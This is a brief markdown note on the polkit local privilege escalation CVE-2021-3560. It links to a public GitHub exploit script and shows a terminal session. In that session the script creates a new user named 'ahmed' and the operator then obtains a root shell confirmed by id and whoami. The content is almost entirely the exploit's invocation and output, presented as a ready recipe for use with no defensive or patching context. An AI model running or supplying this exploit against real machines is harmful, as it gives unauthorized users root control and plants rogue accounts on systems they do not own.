## Privilege escalation with polkit - CVE-2021-3560 #### Exploit url https://github.com/Almorabea/Polkit-exploit/tree/main #### Exploit example ``` test@ubuntu:~/Desktop$ python3 CVE-2021-3560.py ************** Exploit: Privilege escalation with polkit - CVE-2021-3560 Exploit code written by Ahmad Almorabea @almorabea Original Exploit Author: Kevin Backhouse For more details check this: https://github.blog/2021-06-10-privilege-escalation-polkit-root-on-linux-with-bug/#history [+]Starting the Exploit [+] User Created with the name of ahmed [+] Timed out at: 0.008446890996407191 [+] Timed out at: 0.008934336684707084 [+] Exploit Completed, your new user is 'Ahmed' just log into it like, 'su ahmed', and then 'sudo su' to root bash: cannot set terminal process group (46983): Inappropriate ioctl for device bash: no job control in this shell root@ubuntu:/home/test/Desktop# id uid=0(root) gid=0(root) groups=0(root) root@ubuntu:/home/test/Desktop# whoami root root@ubuntu:/home/test/Desktop# ```